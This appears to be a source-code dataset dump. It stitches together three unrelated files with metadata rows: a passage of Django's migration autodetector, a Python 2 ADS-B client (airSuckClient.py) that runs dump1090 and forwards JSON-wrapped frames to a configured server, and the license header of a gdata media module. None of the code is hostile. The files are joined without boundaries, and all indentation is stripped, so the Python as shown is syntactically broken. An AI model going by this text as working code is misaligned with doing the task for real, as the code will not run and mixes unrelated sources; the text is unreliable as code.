def _generate_altered_foo_together(self, operation):
option_name = operation.option_name
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
# We run the old version through the field renames to account for those
old_value = old_model_state.options.get(option_name) or set()
if old_value:
old_value = {
tuple(
self.renamed_fields.get((app_label, model_name, n), n)
for n in unique
)
for unique in old_value
}
new_value = new_model_state.options.get(option_name) or set()
if new_value:
new_value = set(new_value)
if old_value != new_value:
self.add_operation(
app_label,
operation(
name=model_name,
**{option_name: new_value}
)
)
def generate_altered_unique_together(self):
self._generate_altered_foo_together(operations.AlterUniqueTogether)
def generate_altered_index_together(self):
self._generate_altered_foo_together(operations.AlterIndexTogether)
def generate_altered_db_table(self):
models_to_check = self.kept_model_keys.union(self.kept_proxy_keys).union(self.kept_unmanaged_keys)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_db_table_name = old_model_state.options.get('db_table')
new_db_table_name = new_model_state.options.get('db_table')
if old_db_table_name != new_db_table_name:
self.add_operation(
app_label,
operations.AlterModelTable(
name=model_name,
table=new_db_table_name,
)
)
def generate_altered_options(self):
"""
Works out if any non-schema-affecting options have changed and
makes an operation to represent them in state changes (in case Python
code in migrations needs them)
"""
models_to_check = self.kept_model_keys.union(
self.kept_proxy_keys
).union(
self.kept_unmanaged_keys
).union(
# unmanaged converted to managed
set(self.old_unmanaged_keys).intersection(self.new_model_keys)
).union(
# managed converted to unmanaged
set(self.old_model_keys).intersection(self.new_unmanaged_keys)
)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_options = dict(
option for option in old_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
new_options = dict(
option for option in new_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
if old_options != new_options:
self.add_operation(
app_label,
operations.AlterModelOptions(
name=model_name,
options=new_options,
)
)
def generate_altered_order_with_respect_to(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if (old_model_state.options.get("order_with_respect_to", None) !=
new_model_state.options.get("order_with_respect_to", None)):
# Make sure it comes second if we're adding
# (removal dependency is part of RemoveField)
dependencies = []
if new_model_state.options.get("order_with_respect_to", None):
dependencies.append((
app_label,
model_name,
new_model_state.options["order_with_respect_to"],
True,
))
# Actually generate the operation
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=new_model_state.options.get('order_with_respect_to', None),
),
dependencies=dependencies,
)
def generate_altered_managers(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if old_model_state.managers != new_model_state.managers:
self.add_operation(
app_label,
operations.AlterModelManagers(
name=model_name,
managers=new_model_state.managers,
)
)
def arrange_for_graph(self, changes, graph, migration_name=None):
"""
Takes in a result from changes() and a MigrationGraph,
and fixes the names and dependencies of the changes so they
extend the graph from the leaf nodes for each app.
"""
leaves = graph.leaf_nodes()
name_map = {}
for app_label, migrations in list(changes.items()):
if not migrations:
continue
# Find the app label's current leaf node
app_leaf = None
for leaf in leaves:
if leaf[0] == app_label:
app_leaf = leaf
break
# Do they want an initial migration for this app?
if app_leaf is None and not self.questioner.ask_initial(app_label):
# They don't.
for migration in migrations:
name_map[(app_label, migration.name)] = (app_label, "__first__")
del changes[app_label]
continue
# Work out the next number in the sequence
if app_leaf is None:
next_number = 1
else:
next_number = (self.parse_number(app_leaf[1]) or 0) + 1
# Name each migration
for i, migration in enumerate(migrations):
if i == 0 and app_leaf:
migration.dependencies.append(app_leaf)
if i == 0 and not app_leaf:
new_name = "0001_%s" % migration_name if migration_name else "0001_initial"
else:
new_name = "%04i_%s" % (
next_number,
migration_name or self.suggest_name(migration.operations)[:100],
)
name_map[(app_label, migration.name)] = (app_label, new_name)
next_number += 1
migration.name = new_name
# Now fix dependencies
for app_label, migrations in changes.items():
for migration in migrations:
migration.dependencies = [name_map.get(d, d) for d in migration.dependencies]
return changes
def _trim_to_apps(self, changes, app_labels):
"""
Takes changes from arrange_for_graph and set of app labels and
returns a modified set of changes which trims out as many migrations
that are not in app_labels as possible.
Note that some other migrations may still be present, as they may be
required dependencies.
"""
# Gather other app dependencies in a first pass
app_dependencies = {}
for app_label, migrations in changes.items():
for migration in migrations:
for dep_app_label, name in migration.dependencies:
app_dependencies.setdefault(app_label, set()).add(dep_app_label)
required_apps = set(app_labels)
# Keep resolving till there's no change
old_required_apps = None
while old_required_apps != required_apps:
old_required_apps = set(required_apps)
for app_label in list(required_apps):
required_apps.update(app_dependencies.get(app_label, set()))
# Remove all migrations that aren't needed
for app_label in list(changes.keys()):
if app_label not in required_apps:
del changes[app_label]
return changes
@classmethod
def suggest_name(cls, ops):
"""
Given a set of operations, suggests a name for the migration
they might represent. Names are not guaranteed to be unique,
but we put some effort in to the fallback name to avoid VCS conflicts
if we can.
"""
if len(ops) == 1:
if isinstance(ops[0], operations.CreateModel):
return ops[0].name_lower
elif isinstance(ops[0], operations.DeleteModel):
return "delete_%s" % ops[0].name_lower
elif isinstance(ops[0], operations.AddField):
return "%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif isinstance(ops[0], operations.RemoveField):
return "remove_%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif len(ops) > 1:
if all(isinstance(o, operations.CreateModel) for o in ops):
return "_".join(sorted(o.name_lower for o in ops))
return "auto_%s" % datetime.datetime.now().strftime("%Y%m%d_%H%M")
@classmethod
def parse_number(cls, name):
"""
Given a migration name, tries to extract a number from the
beginning of it. If no number found, returns None.
"""
if re.match(r"^\d+_", name):
return int(name.split("_")[0])
return None
| bsd-3-clause | -44,870,453,815,950,104 | 47.424889 | 166 | 0.546753 | false |
ThreeSixes/airSuck | airSuckClient.py | 1 | 41255 | #!/usr/bin/python
"""
airSuckClient by ThreeSixes (https://github.com/ThreeSixes)
This project is licensed under GPLv3. See COPYING for dtails.
This file is part of the airSuck project (https://github.com/ThreeSixes/airSUck).
"""
###########
# Imports #
###########
try:
import config
except:
raise IOError("No configuration present. Please copy config/config.py to the airSuck folder and edit it.")
# Load the config _very_ early.
asConfig = config.airSuckClientSettings
# If we have an attached GPS...
if asConfig['gps']:
# Do GPS things.
from gps import *
import datetime
import json
import re
import socket
import time
import threading
import traceback
import Queue
import atexit
import signal
import sys
import errno
from libAirSuck import asLog
from subprocess import Popen, PIPE, STDOUT
from pprint import pprint
#########################
# dump1090Handler class #
#########################
class airSuckClient():
# Class consructor
def __init__(self):
"""
dump1090Handler handles the dump1090 executable to grab ADS-B, and makes sure it's running. If the process jams it's restarted.
"""
# Init message.
logger.log("Init airSuckClient...")
# Build the command we need to run dump1090 in a fashion Popen can understand.
self.popenCmd = [asConfig['dump1090Path']] + asConfig['dump1090Args'].split(" ")
# Pre-compiled regex used to verify dump1090 ADS-B data.
self.__re1090 = re.compile("[@*]([a-fA-F0-9])+;")
#self.__re1090Mlat = re.compile("[@*]([a-fA-F0-9])+;")
# Watchdog setup.
self.__myWatchdog = None
self.__lastADSB = 0
self.__watchdog1090Restart = False
self.__lastSrvKeepalive = 0
self.__keepAliveTimer = 0
self.__maxTimeSrv = 2.0 * asConfig['keepaliveInterval']
self.__keepaliveJSON = "{\"keepalive\": \"abcdef\"}"
# Backoff counters
self.__backoff1090 = 1.0
self.__backoffSrv = 1.0
# Networking.
self.__serverSock = None
self.__serverConnected = False
self.__rxBuffSz = 128
# Should we keep going?
self.__keepRunning = True
# Queue worker running?
self.__queueWorkerRunning = False
# RX watcher running?
self.__rxWatcherRunning = False
# Dump1090 running?
self.__dump1090Running = False
# Global dump1090 process holder.
self.__proc1090 = None
# GPSD stuff...
# Do we have an initial position?
self.__gpsdData = False
# Is there anything prohibiting the start of the GPS worker?
self.__startGpsWorker = asConfig['gps']
def __clientWatchdog(self):
"""
Master watchdog for the software client.
"""
# If we're connected to the server do the network checks.
if self.__serverConnected:
try:
# Check to see if we got data from dump1090.
if self.__lastSrvKeepalive >= self.__maxTimeSrv:
# Raise an exception.
raise IOError()
else:
# Increment our last entry.
self.__lastSrvKeepalive += 1
except IOError:
# Print the error message
logger.log("airSuck client watchdog: No keepalive for %s sec." %self.__maxTimeSrv)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
try:
# If we're connected.
if self.__serverConnected:
# If it's time to send the keepalive...
if self.__keepAliveTimer >= asConfig['keepaliveInterval']:
self.__keepAliveTimer = 0
if self.__keepAliveTimer == 0:
# Send the ping.
self.__send(self.__keepaliveJSON)
# Roll the keepalive timer.
self.__keepAliveTimer += 1
else:
# Reset the keeplaive timer.
self.__keepAliveTimer = 0
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
# Set flag indicating whether we restarted because of the watchdog.
self.__watchdog1090Restart = False
# If we're running dump1090 handle timing it out.
if asConfig['dump1090Enabled']:
try:
# Check to see if we got data from dump1090.
if self.__lastADSB >= asConfig['dump1090Timeout']:
# Set watchdog restart flag.
self.__watchdog1090Restart = True
try:
# Kill dump1090
self.__proc1090.kill()
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
# Do nothing in the event it fails.
pass
# Raise an exception.
raise IOError()
else:
# Increment our last entry.
self.__lastADSB += 1
except IOError:
# Print the error message
logger.log("airSuck client watchdog: No data from dump1090 in %s sec." %asConfig['dump1090Timeout'])
try:
# Stop dump1090.
self.__proc1090.kill()
except:
# Do nothing, since it won't die nicely in some cases.
pass
finally:
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Restart our watchdog.
self.__myWatchdog = threading.Timer(1.0, self.__clientWatchdog)
self.__myWatchdog.start()
def __rxWatcher(self):
"""
Handle data recieved from our connected socket.
"""
# Flag the RX watcher as running
self.__rxWatcherRunning = True
# Loop guard
keepRunning = True
# Empty buffer string.
buff = ""
# While we're connected
while keepRunning:
try:
if self.__serverConnected == True:
# Get data.
buff = buff + self.__serverSock.recv(self.__rxBuffSz)
# If we have a newline check of our string and clear the buffer.
if buff.find("\n"):
# If we got our JSON sentence reset the counter.
if buff == self.__keepaliveJSON + "\n":
self.__lastSrvKeepalive = 0
# If we're debugging log the things.
if asConfig['debug']:
logger.log("RX Keepalive: %s" %buff.strip())
# Reset data stuff.
buff = ""
# Attempt to send another keepalive.
self.__send(self.__keepaliveJSON)
except KeyboardInterrupt:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# Pass the exception up the chain.
raise KeyboardInterrupt
except SystemExit:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# pass the system exit exception up the stack.
raise SystemExit
except socket.timeout:
# If we time out do nothing. This is intentional.
None
except Exception as e:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# We probably disconnected.
self.__serverConnected = False
if 'errno' in e:
# If something goes wrong...
if e.errno == 32:
# We expect this to break this way sometimes.
raise IOError
else:
tb = traceback.format_exc()
logger.log("Exception in airSuck client rxWatcher:\n%s" %tb)
def __gpsWorker(self):
"""
This monitors GPSD for new data and updates our class-wide GPS vars.
"""
logger.log("Starting GPS worker...")
# We shouldn't start another GPS worker unless we have an exception.
self.__startGpsWorker = False
# If loading GPS worked...
canHasGps = False
try:
# If we have a gps set it up.
if asConfig['gps']:
self.__gps = gps(mode=WATCH_ENABLE)
# We're up!
canHasGps = True
try:
# Keep doing the things.
while(canHasGps):
# Get the "next" data...
self.__gps.next()
# Set our flag to let the system know we have an initial reading.
self.__gpsdData = True
# If we have an keyboard interrupt or system exit pass it on.
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except:
# Whatever else happens we want to log.
tb = traceback.format_exc()
logger.log("GPS worker blew up:\n%s" %tb)
# Dump message and wait 30 sec before clearing the fail flag.
logger.log("GPS worker sleeping 30 sec.")
time.sleep(30.0)
# Now we want to try and start again.
self.__startGpsWorker = True
except:
# Flag the gpsWorker thread as down.
self.__gpsWorkerRunning = False
self.__gpsWorkerFail = True
# Whatever else happens we want to log.
tb = traceback.format_exc()
logger.log("GPS worker blew up trying to activte the GPS:\n%s" %tb)
# Dump message and wait 30 sec before clearing the fail flag.
logger.log("GPS worker sleeping 30 sec.")
time.sleep(30.0)
# Now we want to try and start again.
self.__startGpsWorker = True
def __handleBackoffSrv(self, reset=False):
"""
Handle the backoff algorithm for reconnect delay. Accepts one optional argument, reset which is a boolean value. When reset is true, the backoff value is set back to 1. Returns no data.
"""
# If we're resetting the backoff set it to 1.0.
if reset:
self.__backoffSrv = 1.0
else:
# backoff ^ 2 for each iteration, ending at 4.0.
if self.__backoffSrv == 1.0:
self.__backoffSrv = 2.0
elif self.__backoffSrv == 2.0:
self.__backoffSrv = 4.0
return
def __handleBackoff1090(self, reset=False):
"""
Handle the backoff algorithm for restart delay. Accepts one optional argument, reset which is a boolean value. When reset is true, the backoff value is set back to 1. Returns no data.
"""
# If we're resetting the backoff set it to 1.0.
if reset:
self.__backoff1090 = 1.0
else:
# backoff ^ 2 for each iteration, ending at 4.0.
if self.__backoff1090 == 1.0:
self.__backoff1090 = 2.0
elif self.__backoff1090 == 2.0:
self.__backoff1090 = 4.0
return
def __createBaseJSON(self):
"""
Creates a base JSON dictionary with information generic to all output.
"""
# Get the timestamp data.
dtsStr = str(datetime.datetime.utcnow())
# Create basic JSON dictionary.
retVal = {"clientName": asConfig['myName'], "dataOrigin": "airSuckClient", "dts": dtsStr}
# If we have gps support enabled...
if asConfig['gps']:
try:
# And if we have an initial reading plus a fix...
if self.__gpsdData and (self.__gps.fix.mode > 1):
# Update dictionary with GPS-related data.
retVal.update({"srcLat": self.__gps.fix.latitude, "srcLon": self.__gps.fix.longitude, "srcPosMeta": "gps"})
elif asConfig['reportPos']:
try:
# Update dictionary with GPS-related data.
retVal.update({"srcLat": float(asConfig['myPos'][0]), "srcLon": float(asConfig['myPos'][1]), "srcPosMeta": "manual"})
except:
logger.log("Improperly formatted position data from config.py.")
except:
tb = traceback.format_exc()
logger.log("Failed to get GPS position data:%s" %tb)
else:
# Handle GPS and related config data here.
if asConfig['reportPos']:
try:
# Update dictionary with GPS-related data.
retVal.update({"srcLat": float(asConfig['myPos'][0]), "srcLon": float(asConfig['myPos'][1]), "srcPosMeta": "manual"})
except:
logger.log("Improperly formatted position data from config.py.")
return retVal
def __verifyADSB(self, line):
"""
Verifies the formattting of the potential ADS-B frame. If the incoming data doesn't match the regex the method returns False. If it matches it will return True.
"""
# Assume we don't have good data by default.
retVal = False
# If we get a match...
if self.__re1090.match(line) is not None:
retVal = True
# If we're debugging log the things.
if asConfig['debug']:
logger.log("%s appears to be valid ADS-B." %line.strip())
# And return...
return retVal
def __handleADSB(self, adsb):
"""
Place holder method that should result in the data being JSON wrapped and sent over the network.
"""
# Reset watchdog value.
self.__lastADSB = 0
# Build a dictionary with minimal information to send.
adsbDict = {"type": "airSSR", "data": adsb.strip()}
adsbDict.update(self.__createBaseJSON())
try:
# JSONify the dictionary.
adsbJSON = json.dumps(adsbDict)
except:
tb = traceback.format_exc()
logger.log("Exception occured creating JSON dictionary:\n%s" %tb)
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Enqueue: %s" %adsbJSON)
try:
# Put it on the queue.
clientQ.put(adsbJSON)
except:
tb = traceback.format_exc()
logger.log("dump1090 exception putting data on queue:\n%s" %tb)
return
def __stdoutWorker(self):
"""
Handle STDOUT output from dump1090.
"""
try:
# While we're still running...
while self.__proc1090.poll() is None:
# Grab the current line from STDOUT.
output = self.__proc1090.stdout.readline()
# If we're debugging dump the raw data
if asConfig['debug']:
logger.log("dump1090 stdout: %s" %output.strip())
# If it seems to be valid ADS-B then use it.
if self.__verifyADSB(output):
# If we're debugging...
if asConfig['debug']:
logger.log("Passing %s to __handleADSB." %output.strip())
self.__handleADSB(output)
# Get any 'straggling' output.
output = self.__proc1090.communicate()[0]
# If we're debugging dump the raw data
if asConfig['debug']:
logger.log("dump1090 stdout: %s" %output.strip())
# If it seems to be valid ADS-B then use it.
if self.__verifyADSB(output):
self.__handleADSB(output)
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except AttributeError:
# Just die nicely.
pass
except IOError:
# Just die nicely.
None
def __stderrWorker(self):
"""
Handle STDERR output from dump1090.
"""
try:
# While we're still running...
while self.__proc1090.poll() is None:
# Get our STDERR output minus the newline char.
output = self.__proc1090.stderr.readline().replace("\n", "")
# If we're debugging...
if asConfig['debug']:
# If there's something on the line print it.
if output.strip() != "":
logger.log("dump1090 stderr: %s" %output)
# See if there's any data that wasn't picked up by our loop and print it, too.
output = self.__proc1090.communicate()[1].replace("\n", "")
# If we're debugging...
if asConfig['debug']:
if output.strip() != "":
logger.log("dump1090 stderr: %s" %output)
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except AttributeError:
# Just die nicely.
pass
except IOError:
# Just die nicely.
None
def __connectServer(self):
"""
Connects to our host.
"""
# Create a new socket object.
self.__serverSock = socket.socket()
# Print message
logger.log("airSuck client connecting to %s:%s..." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Attempt to connect.
try:
# Connect up
self.__serverSock.connect((asConfig['connSrvHost'], asConfig['connSrvPort']))
logger.log("airSuck client connected.")
# We're connected now.
self.__serverConnected = True
# Reset the last keepalive counter.
self.__lastSrvKeepalive = 0
# Reset the watchdog state.
self.__watchdogFail = False
# Reset the backoff value
self.__handleBackoffSrv(True)
# Set 1 second timeout for blocking operations.
self.__serverSock.settimeout(1.0)
# The TX and RX watchdogs should be run every second.
self.__lastSrvKeepalive = 0
except KeyboardInterrupt:
# Pass it up the stack.
raise KeyboardInterrupt
except SystemExit:
# Pass it up the stack.
raise SystemExit
except socket.error, v:
# Connection refused.
if v[0] == errno.ECONNREFUSED:
logger.log("%s:%s refused connection." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Connection refused.
elif v[0] == errno.ECONNRESET:
logger.log("%s:%s reset connection." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Connection timeout.
elif v[0] == errno.ETIMEDOUT:
logger.log("Connection to %s:%s timed out." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# DNS or address error.
elif v[0] == -2:
logger.log("%s:%s DNS resolution failure or invalid address." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Something else happened.
else:
logger.log("%s:%s unhandled socket error: %s (%s)" %(asConfig['connSrvHost'], asConfig['connSrvPort'], v[1], v[0]))
# Set backoff delay.
boDelay = asConfig['reconnectDelay'] * self.__backoffSrv
# In the event our connect fails, try again after the configured delay
logger.log("airSuck client sleeping %s sec." %boDelay)
time.sleep(boDelay)
# Handle backoff.
self.__handleBackoffSrv()
except Exception as e:
# Dafuhq happened!?
tb = traceback.format_exc()
logger.log("airSuck client went boom connecting:\n%s" %tb)
# Set backoff delay.
boDelay = asConfig['reconnectDelay'] * self.__backoffSrv
# In the event our connect fails, try again after the configured delay
logger.log("airSuck client sleeping %s sec." %boDelay)
time.sleep(boDelay)
# Handle backoff.
self.__handleBackoffSrv()
def __disconnectSouce(self):
"""
Disconnect from our host.
"""
logger.log("airSuck client disconnecting.")
# Clear the server connected flag.
self.__serverConnected = False
try:
# Close the connection.
self.__serverSock.close()
except:
tb = traceback.format_exc()
logger.log("airSuck client threw exception disconnecting.\n%s" %tb)
# Reset the last keepalive counter.
self.__lastSrvKeepalive = 0
def __send(self, data):
"""
Sends specified data to the airSuck destination server.
"""
# If we think we're connected try to send the infos. If not, do nothing.
if self.__serverConnected:
try:
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Netsend: %s" %data)
# Send the data to the server.
sendRes = self.__serverSock.send("%s\n" %data)
# If we weren't able to send anything...
if sendRes == 0:
# Cause a small explosion.
raise RuntimeError("Socked failed to send data. The connection is down.")
except:
tb = traceback.format_exc()
logger.log("airSuck client send exception:\n%s" %tb)
# Flag our connection as dead in the event we fail to send.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
def __queueWorker(self):
"""
Sends data on the queue to the remote server.
"""
self.__queueWorkerRunning = True
logger.log("airSuck client queue worker starting...")
while True:
try:
# Grab the JSON put on the queue
someJSON = clientQ.get()
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Dequeue: %s" %someJSON)
# And then send it over the network.
self.__send(someJSON)
except:
tb = traceback.format_exc()
logger.log("airSuck client queue worker caught exception reading from queue:\n%s" %tb)
# Flag the queue worker as down.
self.__queueWorkerRunning = False
def __kill1090(self):
"""
Kill the dump1090 process.
"""
logger.log("Attempting to kill dump1090...")
try:
if self.__proc1090.poll() is None:
self.__proc1090.kill()
logger.log("dump1090 killed.")
except AttributeError:
# The process is already dead.
logger.log("dump1090 not running.")
except:
# Unhandled exception.
tb = traceback.format_exc()
logger.log("Exception thrown while killing dump1090:\n%s" %tb)
# Flag dumpairSuckClient1090 as down.
self.__dump1090Running = False
# Blank the object.
self.__proc1090 = None
def __worker(self):
"""
The main worker method that spins up the dump1090 executable and takes data from stdout.
"""
# We want to keep going.
keepRunning = True
# Start our watchdog process.
self.__myWatchdog = threading.Timer(1.0, self.__clientWatchdog)
self.__myWatchdog.start()
# Make sure we kill dump1090 when we shut down.
atexit.register(self.__kill1090)
# Keep running and restarting dump1090 unless the program is killed.
while keepRunning:
# If we have GPS enabled and there's no reason we shouldn't start it.
if asConfig['gps'] and self.__startGpsWorker:
try:
# Start the GPS worker thread.
gpsWorker = threading.Thread(target=self.__gpsWorker)
gpsWorker.daemon = True
gpsWorker.start()
except KeyboardInterrupt:
# Pass it on...
raise KeyboardInterrupt
except SystemExit:
# Pass it up.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client worker blew up starting the GPS worker:\n%s" %tb)
try:
# If we're supposed to keep running and the server is connected.
if keepRunning and (not self.__serverConnected):
self.__connectServer()
except KeyboardInterrupt:
# Pass it on...
raise KeyboardInterrupt
except SystemExit:
# Pass it up.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client worker blew up:\n%s" %tb)
self.__disconnectSouce()
try:
# If the RX watcher is not running
if (not self.__rxWatcherRunning):
# Start the RX watcher...
rxListener = threading.Thread(target=self.__rxWatcher)
rxListener.daemon = True
rxListener.start()
except KeyboardInterrupt:
# Stop looping.
keepRunning = False
# Flag the RX watcher as not running
self.rxWatcherRunning = False
# Raise the keyboard interrupt.
raise KeyboardInterrupt
except SystemExit:
# Stop looping.
keepRunning = False
# Flag the RX watcher as not running
self.rxWatcherRunning = False
# Pass the exception up the chain to our runner.
raise SystemExit
except:
# Log the exception
tb = traceback.format_exc()
logger.log("airSuck client rxListener blew up:\n%s" %tb)
# Flag the RX watcher as not running
self.rxWatcherRunning = False
try:
# If the queue worker isn't running...
if (not self.__queueWorkerRunning):
# Start our queue worker.
queueThread = threading.Thread(target=self.__queueWorker)
queueThread.daemon = True
queueThread.start()
except KeyboardInterrupt:
# Pass the exception up the chain to our runner.
raise KeyboardInterrupt
except SystemExit:
# Pass the exception up the chain to our runner.
raise SystemExit
except:
# Something else unknown happened.
tb = traceback.format_exc()
logger.log("dump1090 worker threw exception:\n%s" %tb)
try:
# Make sure Dump1090 is supposed to start, and that we're supposed to keep it running.
if (asConfig['dump1090Enabled']) and (not self.__dump1090Running):
# We have don't have dump1090 started.
if self.__proc1090 == None:
# Start dump1090.
self.__proc1090 = Popen(self.popenCmd, stdout=PIPE, stderr=PIPE)
# If we have dump1090 working
if self.__proc1090 is not None:
logger.log("dump1090 started with PID %s." %self.__proc1090.pid)
# Flag dump1090 as runningo.
self.__dump1090Running = True
# Reset the backoff since we manged to start.
self.__handleBackoff1090(True)
# Start the watchdog after resetting lastADSB.
self.__lastADSB = 0
# Set up some threads to listen to the dump1090 output.
stdErrListener = threading.Thread(target=self.__stderrWorker)
stdOutListener = threading.Thread(target=self.__stdoutWorker)
stdErrListener.daemon = True
stdOutListener.daemon = True
stdErrListener.start()
stdOutListener.start()
# If we intend to restart dump1090 and we didn't kill dump1090 because of the watchdog...
if (not self.__dump1090Running) and (not self.__watchdog1090Restart):
# Handle backoff algorithm before it restarts.
boDly = self.__backoff1090 * asConfig['dump1090Delay']
logger.log("dump1090 sleeping %s sec before restart." %boDly)
time.sleep(boDly)
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Run the backoff handler.
self.__handleBackoff1090()
except KeyboardInterrupt:
# We don't want to keep running since we were killed.
keepRunning = False
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Pass the exception up the chain to our runner.
raise KeyboardInterrupt
except SystemExit:
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Raise the exception again.
raise SystemExit
except OSError:
# Dump an error since the OS reported dump1090 can't run.
logger.log("Unable to start dump1090. Please ensure dump1090 is at %s." %asConfig['dump1090Path'])
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Flag the thread for death.
keepRunning = False
# Attempt to kill dump1090
self.__kill1090()
except:
# Something else unknown happened.
tb = traceback.format_exc()
logger.log("dump1090 worker threw exception:\n%s" %tb)
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Attempt to kill dump1090
self.__kill1090()
try:
# Wait 0.1 seconds before looping.
time.sleep(0.1)
except KeyboardInterrupt:
# We don't want to keep running since we were killed.
keepRunning = False
# Raise the exception again.
raise KeyboardInterrupt
except SystemExit:
# We don't want to keep running since we were killed.
keepRunning = False
# Raise the exception again.
raise SystemExit
def __exitHandler(self, x=None, y=None):
"""
When we're instructed to exit these are the things we should do.
"""
logger.log("Caught signal that wants us to die.")
try:
# Try to kill dump1090.
self.__kill1090()
except:
pass
# Raise this exception to kill the program nicely.
sys.exit(0)
def run(self):
logger.log("Starting dump1090 worker.")
# NOTE:
# Since dump1090 has a bad habit of not dying unless we implement signal
# handlers for signals that result in the death of the client.
try:
signal.signal(signal.SIGTERM, self.__exitHandler)
except:
tb = traceback.format_exc()
logger.log("Death signal handler blew up setting signal handlers:\n%s" %tb)
try:
# Attempt to start the worker.
self.__worker()
except KeyboardInterrupt:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the keyboard interrupt up the chain to our main execution
raise KeyboardInterrupt
except SystemExit:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the exception up the stack.
raise SystemExit
except Exception as e:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the exception up the stack.
raise e
#######################
# Main execution body #
#######################
if __name__ == "__main__":
# Set up our global logger.
logger = asLog(asConfig['logMode'])
# Log startup message.
logger.log("Starting the airSuck client...")
# If we're debugging...
if asConfig['debug']:
# Dump our config.
logger.log("Configuration:\n%s" %asConfig)
# Set up our global objects.
asc = airSuckClient()
clientQ = Queue.Queue()
# Do we have at least one data source configured?
noDS = True
try:
# If we are configured to run the dump1090 client add it to our thread list.
if asConfig['dump1090Enabled']:
# Set the data source config flag.
noDS = False
# If we are configured to run the dump1090 client add it to our thread list.
if asConfig['aisEnabled']:
# Set the data source config flag.
noDS = False
# Start our comms thread.
threadClient = threading.Thread(target=asc.run())
threadClient.daemon = True
threadClient.start()
# If we didn't have a configured data source dump a helpful message.
if noDS:
logger.log("No data sources enabled for the airSuck client. Please enable at least one source in config.py by setting dump1090Enabled and/or aisEnabled to True.")
except KeyboardInterrupt:
logger.log("Keyboard interrupt.")
except SystemExit:
logger.log("System exit.")
except:
tb = traceback.format_exc()
logger.log("Unhandled exception in airSuck client:\n%s" %tb)
logger.log("Shutting down the airSuck client.") | gpl-3.0 | 5,499,725,881,586,714,000 | 34.382504 | 193 | 0.47616 | false |
bhargav2408/python-for-android | python-build/python-libs/gdata/src/gdata/media/__init__.py | 221 | 12093 | # -*-*- encoding: utf-8 -*-*-
#
# This is gdata.photos.media, implementing parts of the MediaRSS spec in gdata structures
#
# $Id: __init__.py 81 2007-10-03 14:41:42Z havard.gulldahl $
#
# Copyright 2007 Håvard Gulldahl
# Portions copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
